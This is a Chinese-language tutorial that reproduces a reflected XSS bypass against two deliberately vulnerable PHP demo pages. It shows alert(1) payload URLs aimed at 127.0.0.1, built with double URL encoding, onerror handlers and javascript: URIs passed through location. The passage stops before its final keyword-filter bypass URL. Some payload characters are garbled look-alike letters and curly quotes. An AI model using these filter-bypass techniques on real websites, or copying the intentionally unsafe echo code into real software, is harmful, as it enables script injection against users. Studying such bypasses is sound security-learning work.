【无标题】

GET传递的参数直接输出在src中会存在反射型xss漏洞，本次复现的目的是利用url编码规则构造url绕过xss限制。

UrlEncode编码规则：将需要转码的字符的ASCII码值转为16进制，然后从右到左，取4位(不足4位直接处理)，每2位做一位，前面加上%，编码成%XY格式。

Demo源代码

<?php header('X-XSS-Protection: 0'); $xss = isset($_GET['xss'])? $_GET['xss'] : ''; $xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss); echo " "; ?>

通过分析源代码可知屏幕上打印图片路径来自于GET传递的参数，同时会将接收到参数中的()$<>'等字符均会被替换为空格。<>被过滤，闭合标签写入新标签不可行；&被过滤，使用&#的HTML实体编码不可行，因此使用url编码
构造url:
闭合双引号，逃逸出限制，利用GET传递一个不存在的参数和onerror函数来触发弹窗
127.0.0.1/demo.php?xss=aa" οnerrοr=“alert(1)
使用url编码替换()
127.0.0.1/demo.php?xss=aa” οnerrοr=“alert%281%29
但浏览器会在提交数据时先进行一次转码，所以进入函数时%28%29又会被转换为()。我们需要让转码后的数据进入函数时保持在%28%29的状态，而%的url编码是%25，因此我们可以这样构建
127.0.0.1/demo.php?xss=aa” οnerrοr=“alert%25281%2529
这样在进入时显示为
127.0.0.1/demo.php?xss=aa” οnerrοr=“alert%281%29
而在浏览器显示数据时又被转换为
127.0.0.1/demo.php?xss=aa” οnerrοr=“alert(1)
我们可以利用location来绕过这一限制， location会将等号右边的所有值变成字符串变量，而变量在js中可以编码，相应的"alert()“替换为JavaScript的一个伪协议"javascript:alert()”，于是
127.0.0.1/demo.php?xss=aa” οnerrοr=location="javascript:alert%25281%2529

Demo1源代码

<?php header('X-XSS-Protection: 0'); $xss = isset($_GET['xss'])?$_GET['xss']:''; $xss = str_replace(array("(",")","&","\\","<",">","'"), '', $xss); if (preg_match('/(script|document|cookie|eval|setTimeout|alert)/', $xss)) { exit('bad'); } echo " "; ?>

相较于前面这里多了对script、alert的关键字限制 。

由于location会将等号右边的值转化为字符串，因此可以利用字符串可拼接的特性绕过关键字限制。

只有字母和数字[0-9a-zA-Z]、一些特殊符号“$-_.+!*'(),”[不包括双引号]、以及某些保留字，才可以不经过编码直接用于url。urlcode不识别加号，所以需要将+转化为%2b，这样在进入时才会被转换为+，返回时正确拼接。

构造的url如下